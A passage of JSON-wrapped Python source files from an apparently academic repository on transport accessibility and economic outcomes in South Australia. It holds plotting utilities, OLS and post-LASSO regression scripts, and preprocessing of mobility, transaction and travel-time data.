legend=True, alpha = 0.5, ax = ax, zorder = 0)\n ax.set_title(title_name, fontsize=18)\n ax.set_axis_off()\n plt.tight_layout() \n fig.savefig(save_path+fig_name+'.png')\n plt.close()\n\n\ndef plot_observed_predicted(df, y_name, x_name, model, save_path, picture_title, fig_name):\n '''\n inputs: dataframe, name of output, name of inputs, saved sm model.\n output: saved plot to save_path/fig_name.png\n '''\n y = np.log(df[y_name])\n X = np.log(df[x_name])\n X = sm.add_constant(X)\n pred_y = model.predict(X)\n fig, ax = plt.subplots(figsize = (4, 4))\n ax.scatter(y, pred_y, s = 0.5, color = 'g', marker='o')\n\n # rerun a y ~ pred_y regression for linear visualization.\n linear_visual_mod = sm.OLS(pred_y, sm.add_constant(y))\n linear_visual_res = linear_visual_mod.fit()\n y_list = np.array(np.linspace(np.min(y), np.max(y), 100))\n pred_y_list = linear_visual_res.predict(sm.add_constant(y_list))\n ax.plot(y_list, pred_y_list, linewidth = 2, color = 'r')\n\n ax.set_xlabel(\"Observed\", fontsize = 12)\n ax.set_ylabel(\"Predicted\", fontsize = 12)\n ax.set_xlim(np.min(y_list) - .2* np.std(y_list), np.max(y_list) + .2* np.std(y_list))\n ax.set_ylim(np.min(pred_y) - .2* np.std(pred_y), np.max(pred_y) + .2* np.std(pred_y))\n ax.set_title(picture_title, fontsize = 15)\n ax.annotate(\"R2 = \"+str(np.round(model.rsquared, 2)), xy=(.25, .8), xycoords='figure fraction', fontsize = 20)\n plt.tight_layout()\n fig.savefig(save_path+fig_name+\".png\")\n plt.close()\n\n\ndef latex_table(all_vars, models):\n # inputs:\n # a full list of all the variables\n # a list of statsmodel output models.\n # outputs:\n # a latex table form.\n\n # create a base table for latex outputs\n errors = []\n for elt in all_vars:\n e = elt + \"_err\"\n errors.append(e)\n temp = []\n for i in range(len(all_vars)):\n temp.append(all_vars[i])\n if all_vars[i] not in {'Observations', 'R_squared', 'Adjusted_R_squared'}:\n temp.append(errors[i])\n\n table1 = pd.DataFrame(columns=temp)\n\n # create\n for 
variables, data, model in models:\n dict = {}\n for i, elt in enumerate(all_vars):\n if elt in model.params:\n i = list(model.params.keys()).index(elt)\n pval = model.pvalues[i]\n tag = \"\"\n if pval < 0.001:\n tag = \"***\"\n elif pval < 0.01:\n tag = \"**\"\n elif pval < 0.05:\n tag = \"*\"\n dict[elt] = str(round(model.params[elt], 3)) + tag\n dict[elt + \"_err\"] = \"(\" + str(round(model.bse[elt], 3)) + \")\"\n else:\n dict[elt] = \"\"\n if elt not in {'Observations', 'R_squared', 'Adjusted_R_squared'}:\n dict[elt + \"_err\"] = \"\"\n dict[\"Observations\"] = model.nobs\n dict[\"R_squared\"] = round(model.rsquared, 3)\n dict[\"Adjusted_R_squared\"] = round(model.rsquared_adj, 3)\n i = list(model.params.keys()).index(\"const\")\n pval = model.pvalues[i]\n tag = \"\"\n if pval < 0.001:\n tag = \"***\"\n elif pval < 0.01:\n tag = \"**\"\n elif pval < 0.05:\n tag = \"*\"\n dict[\"Constant\"] = str(round(model.params[\"const\"], 3)) + tag\n dict[\"Constant_err\"] = \"(\" + str(round(model.bse[\"const\"], 3)) + \")\"\n\n table1 = table1.append(dict, ignore_index=True)\n return table1\n\n\ndef post_lasso_estimate(y_name, x_attribute_names, alpha_value, df):\n '''\n :param y_name: name of output y\n :param x_attribute_names: a list of input x\n :param alpha_value: alpha value used for LASSO\n :param df: full dataframe\n :return: returns the input X and trained model\n '''\n y = np.log(df[y_name])\n X = np.log(df[x_attribute_names])\n X = sm.add_constant(X)\n mod = linear_model.Lasso(alpha=alpha_value) # 0.05.\n mod.fit(X, y)\n\n # choose only the sparse coefficients\n coeff_mask = np.abs(mod.coef_) > 0.00001\n coeff_mask = coeff_mask[1:] # remove the first const\n x_attribute_names_sparse = x_attribute_names[coeff_mask]\n\n # choos\n y = np.log(df[y_name])\n X = np.log(df[x_attribute_names_sparse])\n X = sm.add_constant(X)\n mod = sm.OLS(y, X)\n res = mod.fit()\n\n return X, x_attribute_names_sparse, res\n\n\ndef compute_econ_opportunity(metric_name, target_var_name, time_var_name, edge_df, attraction_param, friction_param, o_or_d):\n '''\n :param edge_df: edge data frame\n :param time_var_name: name of the travel duration variable\n :param target_var_name: resource variable\n :return: a dataframe with econ opportunity measure and SA2 idx\n '''\n if o_or_d == 'O':\n sa2_list = np.unique(edge_df['O'])\n elif o_or_d == 'D':\n sa2_list = np.unique(edge_df['D'])\n\n metric_list = []\n for sa2_idx in sa2_list:\n edge_df_sa2_specific = edge_df.loc[edge_df[o_or_d]==sa2_idx, :]\n metric=np.sum(edge_df_sa2_specific[target_var_name]**np.abs(attraction_param) / edge_df_sa2_specific[time_var_name]**np.abs(friction_param))\n metric_list.append(metric)\n\n #\n metric_df = pd.DataFrame({'sa2_code':sa2_list,\n metric_name:metric_list})\n return metric_df\n\n\ndef gini(x):\n # (Warning: This is a concise implementation, but it is O(n**2)\n # in time and memory, where n = len(x). *Don't* pass in huge\n # samples!)\n\n # Mean absolute difference\n mad = np.abs(np.subtract.outer(x, x)).mean()\n # Relative mean absolute difference\n rmad = mad/np.mean(x)\n # Gini coefficient\n g = 0.5 * rmad\n return g\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"
},
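The gini helper at the end of utilities.py computes the Gini coefficient as half the relative mean absolute difference. A minimal self-contained check of that formula is sketched below; the income vectors are made-up illustrations, not project data.

# Self-contained check of the Gini formula used in utilities.py; inputs are made up.
import numpy as np

def gini(x):
    mad = np.abs(np.subtract.outer(x, x)).mean()  # mean absolute pairwise difference
    return 0.5 * mad / np.mean(x)                 # half the relative MAD

print(gini([1, 1, 1, 1]))       # 0.0 -> perfect equality
print(gini([0, 0, 0, 0, 100]))  # 0.8 -> one region holds all the income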
{
"alpha_fraction": 0.7286005616188049,
"alphanum_fraction": 0.7353940010070801,
"avg_line_length": 38.486488342285156,
"blob_id": "66fc07fe6ef34097958baef21f0fa47e73bfcab4",
"content_id": "1fec89f38809cc995ddf2b2bffac4c4fa8eabcef",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2944,
"license_type": "permissive",
"max_line_length": 138,
"num_lines": 74,
"path": "/src/d06_visualization/visualize_accessibility.py",
"repo_name": "cjsyzwsh/South_Australia_Transport_Econ",
"src_encoding": "UTF-8",
"text": "# visualize the status quo accessibility metrics.\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport geopandas as gpd\nimport pickle\nimport statsmodels.api as sm\nfrom sklearn.linear_model import LassoCV\nfrom sklearn.preprocessing import normalize\nfrom sklearn import linear_model\n\n# system path\nimport sys\nimport os\n\n# util path\nutility_path = os.path.join(os.getcwd(),'src/d00_utils/')\nsys.path.append(utility_path)\nimport utilities as util\n\n# path\nprocessing_data_path = os.path.join(os.getcwd(),'data/03_processed/')\nmodel_path = os.path.join(os.getcwd(),'data/04_models/')\nmodel_output_path = os.path.join(os.getcwd(),'data/05_model_outputs/')\nreport_path = os.path.join(os.getcwd(),'data/06_reporting/')\n\n# read files\nwith open(processing_data_path+'edge_shp.pickle', 'rb') as f:\n edge_shp = pickle.load(f)\n\nwith open(processing_data_path+'node_shp.pickle', 'rb') as f:\n node_shp = pickle.load(f)\n\nwith open(model_output_path+'edge_df_policy_simulation.pickle', 'rb') as f:\n edge_df_policy_simulation = pickle.load(f)\n\nwith open(model_output_path+'node_df_policy_simulation.pickle', 'rb') as f:\n node_df_policy_simulation = pickle.load(f)\n\n#\nnode_shp = node_shp.merge(node_df_policy_simulation[['SA2_MAIN16','pop_based_consumption_opportunity','job_based_consumption_opportunity',\n 'amenity_based_consumption_opportunity','diversity_based_consumption_opportunity']],\n on=['SA2_MAIN16'],how='inner')\n\n# reload node_shp for the visualization function\nwith open(processing_data_path+'node_shp.pickle', 'rb') as f:\n node_shp_complete = pickle.load(f)\n\n\n# plot the accessibility metrics\ncolumn_name = 'pop_based_consumption_opportunity'\ntitle_name = 'Population-based consumption opportunities'\nsave_path = report_path+'accessibility_metrics/'\nfig_name = 'pop_based_consumption_opp'\nutil.plot_sa2_node_attributes(node_shp, column_name, title_name, fig_name, save_path, node_shp_complete)\n\ncolumn_name = 'job_based_consumption_opportunity'\ntitle_name = 'Job-based consumption opportunities'\nsave_path = report_path+'accessibility_metrics/'\nfig_name = 'job_based_consumption_opp'\nutil.plot_sa2_node_attributes(node_shp, column_name, title_name, fig_name, save_path, node_shp_complete)\n\ncolumn_name = 'amenity_based_consumption_opportunity'\ntitle_name = 'Amenity-based consumption opportunities'\nsave_path = report_path+'accessibility_metrics/'\nfig_name = 'amenity_based_consumption_opp'\nutil.plot_sa2_node_attributes(node_shp, column_name, title_name, fig_name, save_path, node_shp_complete)\n\ncolumn_name = 'diversity_based_consumption_opportunity'\ntitle_name = 'Diversity-based consumption opportunities'\nsave_path = report_path+'accessibility_metrics/'\nfig_name = 'diversity_based_consumption_opp'\nutil.plot_sa2_node_attributes(node_shp, column_name, title_name, fig_name, save_path, node_shp_complete)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"
},
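The opportunity measures plotted above follow the gravity form implemented in utilities.compute_econ_opportunity: for each origin, sum attraction**a / travel_time**b over destinations. A toy computation under that form is sketched below; the edge values and parameters are made up for illustration.

# Toy gravity-style opportunity metric mirroring compute_econ_opportunity; values are made up.
import pandas as pd

edges = pd.DataFrame({
    'O': ['a', 'a', 'b'],
    'D': ['b', 'c', 'c'],
    'poi_count': [50.0, 20.0, 80.0],        # attraction at the destination
    'od_duration': [600.0, 1200.0, 900.0],  # travel time in seconds
})

attraction_param, friction_param = 1.0, 1.0
edges['val'] = edges['poi_count'] ** attraction_param / edges['od_duration'] ** friction_param
opportunity = edges.groupby('O')['val'].sum()
print(opportunity)  # a: 50/600 + 20/1200 = 0.1; b: 80/900 ~= 0.089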
{
"alpha_fraction": 0.6483213901519775,
"alphanum_fraction": 0.6538249850273132,
"avg_line_length": 48.84403610229492,
"blob_id": "b003a54bea6c01627e31bfa28d040ebb3099f617",
"content_id": "fa829895b5e215e4a50bb820f8e6219f0b8f4656",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5451,
"license_type": "permissive",
"max_line_length": 138,
"num_lines": 109,
"path": "/src/d06_visualization/visualize_socioecon.py",
"repo_name": "cjsyzwsh/South_Australia_Transport_Econ",
"src_encoding": "UTF-8",
"text": "# visualization\n# type 1. Visualize the nodes' attributes (sociodemographics, etc.)\n# type 2. Visualize the edges' attributes (flows, etc.)\n# type 3. Visualize the edges' attributes in a sparse manner (flows, etc.)\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport geopandas as gpd\nimport pickle\nimport statsmodels.api as sm\nimport copy\n\n# system path\nimport sys\nimport os\n\n# util path\nutility_path = os.path.join(os.getcwd(),'src/d00_utils/')\nsys.path.append(utility_path)\nimport utilities as util\n\n# path\nprocessing_data_path = os.path.join(os.getcwd(),'data/03_processed/')\nreport_path = os.path.join(os.getcwd(),'data/06_reporting/')\n\n# read data\nwith open(processing_data_path+'node_df.pickle', 'rb') as f:\n node_df = pickle.load(f)\n\nwith open(processing_data_path+'edge_consumption_df.pickle', 'rb') as f:\n edge_consumption_df = pickle.load(f)\n\nwith open(processing_data_path+'edge_flow_df.pickle', 'rb') as f:\n edge_flow_df = pickle.load(f) # more observations\n\nwith open(processing_data_path+'node_shp.pickle', 'rb') as f:\n node_shp = pickle.load(f)\n\nwith open(processing_data_path+'edge_shp.pickle', 'rb') as f:\n edge_shp = pickle.load(f)\n\n# visualize node_shp\nplot_dic = [('total_pop', 'Total population', 'node_socioecon_total_pop'),\n ('pop_density', 'Population density', 'node_socioecon_pop_density'),\n ('tot_num_jobs_000', 'Total jobs', 'node_socioecon_total_jobs'),\n ('median_income_per_job_aud_persons', 'Median income', 'node_socioecon_median_income'),\n ('master_degree_percent', 'Percent of master degree', 'node_socioecon_percent_master'),\n ('poi_count', 'Counts of POIs', 'node_poi_count'),\n ('poi_count_agg', 'Counts of aggregated POIs', 'node_poi_count_agg'),\n ('poi_entropy', 'Entropy of POIs', 'node_poi_entropy'),\n ('poi_entropy_agg', 'Entropy of aggregated POIs', 'node_poi_entropy_agg'),\n ('poi_count_density', 'Count density of POIs', 'node_poi_count_density'),\n ('poi_count_agg_density', 'Count density of aggregated POIs', 'node_poi_count_agg_density'),\n ('poi_entropy_density', 'Entropy density of POIs', 'node_poi_entropy_density'),\n ('poi_entropy_agg_density', 'Entropy density of aggregated POIs', 'node_poi_entropy_agg_density'),\n ('class_HWY', 'Number of highways', 'node_road_class_HWY'),\n ('num_nodes', 'Number of road intersections', 'node_road_num_nodes'),\n ('num_4degree', 'Number of 4-way intersections', 'node_road_num_4degree'),\n ('flow_agents_o', 'Agent flow (origin aggregated)', 'node_flow_agents_o'),\n ('flow_agents_d', 'Agent flow (destination aggregated)', 'node_flow_agents_d'),\n ('consumption_amount_age_source_o', 'Consumption flow (origin aggregated)', 'node_flow_consumption_amount_age_source_o'),\n ('consumption_amount_age_source_d', 'Consumption flow (destination aggregated)', 'node_flow_consumption_amount_age_source_d')]\n\nfor each_plot in plot_dic:\n column_name = each_plot[0]\n title_name = each_plot[1]\n fig_name = each_plot[2]\n save_path = report_path+'node_visual/'\n util.plot_sa2_node_attributes(node_shp, column_name, title_name, fig_name, save_path)\n\n\n# visualize edge_shp\nplot_dic = [('flow_agents', 'Flow of unique agents', 'edge_flow_agents'),\n ('flow_duration', 'Flow of agents duration', 'edge_flow_duration'),\n ('flow_stays', 'Flow of agents stay', 'edge_flow_stays'),\n ('consumption_count_age_source', 'Consumption counts (age source)', 'edge_consumption_count_age_source'),\n ('consumption_amount_age_source', 'Consumption amount (age source)', 
'edge_consumption_amount_age_source'),\n ('consumption_count_mcc_source', 'Consumption counts (mcc source)', 'edge_consumption_count_mcc_source'),\n ('consumption_amount_mcc_source', 'Consumption amount (mcc source)', 'edge_consumption_amount_mcc_source'),\n ('od_duration', 'OD duration', 'edge_od_duration'),\n ('class_HWY', 'Highway connectivity', 'edge_class_HWY'),\n ('class_LOCL', 'Local way connectivity', 'edge_class_LOCL'),\n ('num_nodes', 'Number of nodes', 'edge_num_nodes'),\n ('num_4degree', 'Number of 4-way intersections', 'edge_num_4degree')]\n\n# drop the self loops\nedge_shp = edge_shp.loc[edge_shp['O'] != edge_shp['D'], :]\n\nfor each_plot in plot_dic:\n column_name = each_plot[0]\n title_name = each_plot[1]\n fig_name = each_plot[2]\n save_path = report_path+'edge_visual/'\n util.plot_sa2_edge_attributes(edge_shp, node_shp, column_name, title_name, fig_name, save_path)\n\n# visualize sparse edge plots for the three flow attributes\n# plot_dic = [('flow_agents', 'Flow of unique agents', 'edge_flow_agents_sparse'),\n# ('flow_duration', 'Flow of agents duration', 'edge_flow_duration_sparse'),\n# ('flow_stays', 'Flow of agents stay', 'edge_flow_stays_sparse')]\n\n# visualize sparse\nfor each_plot in plot_dic:\n column_name = each_plot[0]\n title_name = each_plot[1]\n fig_name = each_plot[2]+'_sparse'\n save_path = report_path+'edge_visual/'\n edge_shp_sparse = edge_shp.loc[edge_shp[column_name] > np.mean(edge_shp[column_name])+np.std(edge_shp[column_name]), :]\n util.plot_sa2_edge_attributes(edge_shp_sparse, node_shp, column_name, title_name, fig_name, save_path)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"
},
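The sparse variants above keep only the edges whose attribute exceeds the mean plus one standard deviation, so the maps show just the heavy flows. A toy version of that thresholding is sketched below; the numbers are made up.

# Toy mean+std sparsification as used in the sparse edge plots; values are made up.
import pandas as pd

flows = pd.DataFrame({'flow_agents': [1, 2, 3, 4, 100]})
threshold = flows['flow_agents'].mean() + flows['flow_agents'].std()  # ~65.6 here
sparse = flows.loc[flows['flow_agents'] > threshold]
print(sparse)  # only the outlier edge (100) survives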
{
"alpha_fraction": 0.6672582030296326,
"alphanum_fraction": 0.6779059171676636,
"avg_line_length": 28.552631378173828,
"blob_id": "fb422f08a4c436aaf22c6a8b2782b8ca56d022b5",
"content_id": "5446f3a14b41ddb72c3f1d7d585363f1ee3d11b5",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1127,
"license_type": "permissive",
"max_line_length": 114,
"num_lines": 38,
"path": "/src/d02_intermediate/preprocess_4_travel_time.py",
"repo_name": "cjsyzwsh/South_Australia_Transport_Econ",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport geopandas as gpd\nimport pickle\n\n# system path\nimport sys\nimport os\n\n# util path\nutility_path = os.path.join(os.getcwd(),'src/d00_utils/')\nsys.path.append(utility_path)\nimport utilities as util\n\n# data path\n# sw: define the path based on the root project directory.\nraw_data_path = os.path.join(os.getcwd(),'data/01_raw/')\nintermediate_data_path = os.path.join(os.getcwd(),'data/02_intermediate/')\n\n# mount_path = \"/Users/shenhaowang/Dropbox (MIT)/project_econ_opportunity_south_Australia\"\n\n\n# read files\nwith open(raw_data_path+\"OD_Google_API_raw.pickle\", 'rb') as w:\n OD_time_raw=pickle.load(w)\n\nwith open(raw_data_path+\"OD_Google_API_With_Map_Info.pickle\", 'rb') as w:\n OD_time_SA2=pickle.load(w)\n\n# rename\nOD_time_SA2.rename(columns={'o_sa2_idx':'O',\n 'd_sa2_idx':'D',\n 'od_duration_value':'od_duration',\n 'od_distance_value':'od_distance'}, inplace=True)\n\n# save\nOD_time_SA2[['O','D','od_duration','od_distance']].to_pickle(intermediate_data_path+'sa2_edge_travel_time.pickle')\n\n\n\n\n"
},
{
"alpha_fraction": 0.5608828663825989,
"alphanum_fraction": 0.5672193765640259,
"avg_line_length": 40.62995529174805,
"blob_id": "f484f83a1c933f2629664222e652ba7bc452b636",
"content_id": "f17525e1a9cbb351a230cac04b49caeb93ef89e6",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9469,
"license_type": "permissive",
"max_line_length": 128,
"num_lines": 227,
"path": "/src/d04_modelling/train_models.py",
"repo_name": "cjsyzwsh/South_Australia_Transport_Econ",
"src_encoding": "UTF-8",
"text": "# three models to be trained.\n# 1. travel time ~ travel distance + road attributes. [edge df]\n# 2. mobility or consumption flow ~ origin attributes + destination attributes + travel time [edge df]\n# 3. income ~ mobility flow + controls [node df]\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport geopandas as gpd\nimport pickle\nimport statsmodels.api as sm\nfrom sklearn.linear_model import LassoCV\nfrom sklearn.preprocessing import normalize\nfrom sklearn import linear_model\n\n# system path\nimport sys\nimport os\n\n# util path\nutility_path = os.path.join(os.getcwd(),'src/d00_utils/')\nsys.path.append(utility_path)\nimport utilities as util\n\n# path\nprocessing_data_path = os.path.join(os.getcwd(),'data/03_processed/')\nmodel_path = os.path.join(os.getcwd(),'data/04_models/')\nmodel_output_path = os.path.join(os.getcwd(),'data/05_model_outputs/')\n\n# read data\nwith open(processing_data_path+'node_df.pickle', 'rb') as f:\n node_df = pickle.load(f)\n\nwith open(processing_data_path+'edge_consumption_df.pickle', 'rb') as f:\n edge_consumption_df = pickle.load(f)\n\nwith open(processing_data_path+'edge_flow_df.pickle', 'rb') as f:\n edge_flow_df = pickle.load(f) # more observations\n\n# function\n\n###########################################################################################\n# model 1. infrastructure efficiency.\n###########################################################################################\ny_name = 'od_duration'\nmodel_dic = {'Model 1': (y_name, ['od_distance']),\n 'Model 2': (y_name, ['od_distance', 'num_roads', 'num_nodes']),\n 'Model 3': (y_name, ['od_distance', 'num_roads', 'class_HWY', 'num_nodes', 'num_1degree'])}\nedge_df = edge_flow_df\nmodel_list = []\nall_variables = ['Constant', 'od_distance', 'num_roads', 'class_HWY', 'num_nodes', 'num_1degree']\n\nfor model_idx in model_dic.keys():\n y_name, x_name = model_dic[model_idx]\n y = np.log(edge_df[y_name])\n X = np.log(edge_df[x_name])\n X = sm.add_constant(X)\n mod = sm.OLS(y, X)\n res = mod.fit()\n model_list.append((model_idx, model_dic[model_idx], res))\n\n# export the regression tables as latex\nlatex_table_results = util.latex_table(all_variables, model_list)\nlatex_table_results.index = model_dic.keys()\nprint(latex_table_results.T)\n\n# save\nwith open(model_path+'model1_list_'+y_name+'.pickle', 'wb') as f:\n pickle.dump(model_list, f)\nwith open(model_output_path+'model1_table_'+y_name+'.txt', 'w') as f:\n f.writelines(latex_table_results.T.to_latex())\n\n\n\n###########################################################################################\n# model 2. 
human dynamics.\n###########################################################################################\npd.set_option('display.max_columns', None) # change default columns to max.\n\n# y_name = 'flow_agents'\n# edge_df = edge_flow_df\n# alpha_value = 0.08\n\ny_name = 'consumption_count_mcc_source'\nedge_df = edge_consumption_df\nalpha_value = 0.03\n\n# y_name = 'consumption_amount_mcc_source'\n# edge_df = edge_consumption_df\n# alpha_value = 0.02\n\nmodel_dic = {'Model 1': (y_name, ['od_duration']),\n 'Model 2': (y_name, ['od_duration', 'pop_density_o', 'pop_density_d']),\n 'Model 3': (y_name, ['od_duration', 'job_density_1_o', 'job_density_1_d']),\n 'Model 4': (y_name, ['od_duration', 'poi_count_agg_density_o', 'poi_count_agg_density_d']),\n 'Model 5': (y_name, ['od_duration', 'poi_entropy_agg_density_o', 'poi_entropy_agg_density_d'])}\nmodel_list = []\nall_variables = ['Constant', 'od_duration', 'pop_density_o', 'pop_density_d', 'job_density_1_o', 'job_density_1_d',\n 'poi_count_agg_density_o', 'poi_count_agg_density_d', 'poi_entropy_agg_density_o', 'poi_entropy_agg_density_d']\n\n# Train the first five models\nfor model_idx in model_dic.keys():\n y_name, x_name = model_dic[model_idx]\n y = np.log(edge_df[y_name])\n X = np.log(edge_df[x_name])\n X = sm.add_constant(X)\n mod = sm.OLS(y, X)\n res = mod.fit()\n model_list.append((model_idx, model_dic[model_idx], res))\n\n# Train the last model\nx_attribute_names = np.array(['od_duration',\n 'poi_count_agg_density_o', 'poi_count_agg_density_d',\n 'poi_entropy_density_o', 'poi_entropy_density_d',\n 'poi_entropy_agg_density_o', 'poi_entropy_agg_density_d',\n 'pop_density_o', 'pop_density_d',\n 'job_density_1_o', 'job_density_1_d'\n ])\n\n# train the post lasso model\nX, x_attribute_names_sparse, res = util.post_lasso_estimate(y_name, x_attribute_names, alpha_value, edge_df)\nmodel_list.append(('Post LASSO', (y_name, x_attribute_names_sparse), res))\n\n# latex outputs\nlatex_table_results = util.latex_table(all_variables, model_list)\nlatex_table_results.index = list(model_dic.keys()) + ['Post LASSO']\nprint(latex_table_results.T)\n# latex_table_results.T.to_latex()\n\n# save\nwith open(model_path+'model2_list_'+ y_name +'.pickle', 'wb') as f:\n pickle.dump(model_list, f)\nwith open(model_output_path+'model2_table_'+ y_name +'.txt', 'w') as f:\n f.writelines(latex_table_results.T.to_latex())\n\n\n\n###########################################################################################\n# model 3. 
economic outcomes\n###########################################################################################\n# all potential ys: median_income_per_job_aud_persons, unemployment_rate, poverty_rate_1, poverty_rate_2, median_inc, gini.\ny_name = 'median_income_per_job_aud_persons'\n# y_name = 'num_jobs_000_persons'\nalpha_value = 0.01\n\nmodel_dic = {'Model 1': (y_name, ['flow_agents_o', 'flow_agents_d']),\n 'Model 2': (y_name, ['consumption_amount_mcc_source_o', 'consumption_amount_mcc_source_d']),\n 'Model 3': (y_name, ['consumption_count_mcc_source_o', 'consumption_count_mcc_source_d']),\n 'Model 4': (y_name, ['flow_agents_o', 'flow_agents_d',\n 'consumption_amount_mcc_source_o', 'consumption_amount_mcc_source_d',\n 'consumption_count_mcc_source_o', 'consumption_count_mcc_source_d'\n ]),\n 'Model 5': (y_name, ['flow_agents_o', 'flow_agents_d',\n 'consumption_amount_mcc_source_o', 'consumption_amount_mcc_source_d',\n 'consumption_count_mcc_source_o', 'consumption_count_mcc_source_d',\n 'total_pop','avg_age', 'male_percent', 'bachelor_degree_percent', 'master_degree_percent'\n ])}\nmodel_list = []\nall_variables = ['Constant', 'flow_agents_o', 'flow_agents_d',\n 'consumption_amount_mcc_source_o', 'consumption_amount_mcc_source_d',\n 'consumption_count_mcc_source_o', 'consumption_count_mcc_source_d',\n 'total_pop','avg_age', 'male_percent', 'bachelor_degree_percent', 'master_degree_percent']\n\n# Train the first five models\nfor model_idx in model_dic.keys():\n y_name, x_name = model_dic[model_idx]\n y = np.log(node_df[y_name])\n X = np.log(node_df[x_name])\n X = sm.add_constant(X)\n mod = sm.OLS(y, X)\n res = mod.fit()\n model_list.append((model_idx, model_dic[model_idx], res))\n\n# Train the last model\nx_attribute_names = np.array(['flow_agents_o', 'flow_agents_d',\n 'consumption_amount_mcc_source_o', 'consumption_amount_mcc_source_d',\n 'consumption_count_mcc_source_o', 'consumption_count_mcc_source_d',\n 'total_pop','avg_age', 'male_percent', 'bachelor_degree_percent', 'master_degree_percent'\n ]) # or pop_density?\n\n# train the post lasso model\nX, x_attribute_names_sparse, res = util.post_lasso_estimate(y_name, x_attribute_names, alpha_value, node_df)\nmodel_list.append(('Post LASSO', (y_name, x_attribute_names_sparse), res))\n\n# latex outputs\nlatex_table_results = util.latex_table(all_variables, model_list)\nlatex_table_results.index = list(model_dic.keys()) + ['Post LASSO']\nprint(latex_table_results.T)\n\n# save\nwith open(model_path+'model3_list_'+ y_name +'.pickle', 'wb') as f:\n pickle.dump(model_list, f)\nwith open(model_output_path+'model3_table_'+ y_name +'.txt', 'w') as f:\n f.writelines(latex_table_results.T.to_latex())\n\n\n###########################################################################################\n# model 4. 
Scaling diagnosis\n###########################################################################################\nX = np.log(node_df['pop_density'])\ny_list = ['median_income_per_job_aud_persons',\n 'flow_agents_o',\n 'flow_agents_d',\n 'consumption_count_mcc_source_o',\n 'consumption_count_mcc_source_d',\n 'consumption_amount_mcc_source_o',\n 'consumption_amount_mcc_source_d',\n 'poi_count_agg',\n 'poi_count_agg_density',\n 'poi_entropy_agg',\n 'poi_entropy_agg_density',\n 'num_roads',\n 'num_nodes'\n ]\n\nmodel_list = []\n\n# param_dic = {}\nfor y_name in y_list:\n # print(y_name)\n y = np.log(node_df[y_name])\n mod = sm.OLS(y, X)\n res = mod.fit()\n model_list.append(('_', (y_name, 'pop_density'), res))\n\nwith open(model_path+'model4_list_scaling_''.pickle', 'wb') as f:\n pickle.dump(model_list, f)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"
},
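All three models above are estimated in log-log form, so each coefficient reads directly as an elasticity. The sketch below, on synthetic data, recovers a known elasticity with the same np.log / sm.add_constant / sm.OLS pattern; the variable values and the 0.7 elasticity are illustrative assumptions, not project results.

# Synthetic log-log OLS: the fitted slope is the elasticity (~0.7 by construction).
import numpy as np
import statsmodels.api as sm

rng = np.random.default_rng(0)
x = rng.uniform(1.0, 100.0, size=500)
y = x ** 0.7 * np.exp(rng.normal(0.0, 0.1, size=500))  # true elasticity 0.7

X = sm.add_constant(np.log(x))
res = sm.OLS(np.log(y), X).fit()
print(res.params)  # slope near 0.7: a 1% rise in x implies ~0.7% rise in y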
{
"alpha_fraction": 0.6847946643829346,
"alphanum_fraction": 0.702774703502655,
"avg_line_length": 51.78823471069336,
"blob_id": "d9c06209dd8aaeede5b4052e39c5428a76be8c32",
"content_id": "57e171c51ca462139e0acafcbeb2c36f6098296d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4505,
"license_type": "permissive",
"max_line_length": 147,
"num_lines": 85,
"path": "/src/d02_intermediate/preprocess_3_network_flow.py",
"repo_name": "cjsyzwsh/South_Australia_Transport_Econ",
"src_encoding": "UTF-8",
"text": "# process the network flow data\n# three inputs: mobility flow, transaction flow with age bins, and transaction flow with activity bins\n# outputs: sa2_edge_flow - network edges with flow and transaction data\n\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport geopandas as gpd\n\n# system path\nimport sys\nimport os\n\n# util path\nutility_path = os.path.join(os.getcwd(),'src/d00_utils/')\nsys.path.append(utility_path)\nimport utilities as util\n\n# data path\n# sw: define the path based on the root project directory.\nraw_data_path = os.path.join(os.getcwd(),'data/01_raw/')\nintermediate_data_path = os.path.join(os.getcwd(),'data/02_intermediate/')\n\n# mount_path = \"/Users/shenhaowang/Dropbox (MIT)/project_econ_opportunity_south_Australia\"\n\n# read files\nflow_df = pd.read_csv(raw_data_path + \"flows_sa2_months_2018-02-01.csv\")\ntrans_age_df = pd.read_csv(raw_data_path + \"transaction_age_bins.csv\")\ntrans_mcc_df = pd.read_csv(raw_data_path + \"transaction_mcc.csv\")\nsa2_adelaide_edge = gpd.read_file(intermediate_data_path+'shapefiles/sa2_adelaide_edge.shp')\n\n# Change sa2 values to string\nflow_df['sa2'] = flow_df.sa2.astype(str)\nflow_df['agent_home_sa2'] = [x[:-2] for x in flow_df['agent_home_sa2'].astype(str)]\ntrans_age_df['source_sa2'] = trans_age_df['source_sa2'].astype(str)\ntrans_age_df['target_sa2'] = trans_age_df['target_sa2'].astype(str)\ntrans_mcc_df['source_sa2'] = trans_mcc_df['source_sa2'].astype(str)\ntrans_mcc_df['target_sa2'] = trans_mcc_df['target_sa2'].astype(str)\n\n# remove invalid values\ninvalid_value_list = ['Cell Size Limit', 'nan', 'OUTST']\ntrans_age_df=trans_age_df.loc[~trans_age_df.source_sa2.isin(invalid_value_list)]\ntrans_age_df=trans_age_df.loc[~trans_age_df.target_sa2.isin(invalid_value_list)]\ntrans_mcc_df=trans_mcc_df.loc[~trans_mcc_df.source_sa2.isin(invalid_value_list)]\ntrans_mcc_df=trans_mcc_df.loc[~trans_mcc_df.target_sa2.isin(invalid_value_list)]\n\n# choose only the adelaide 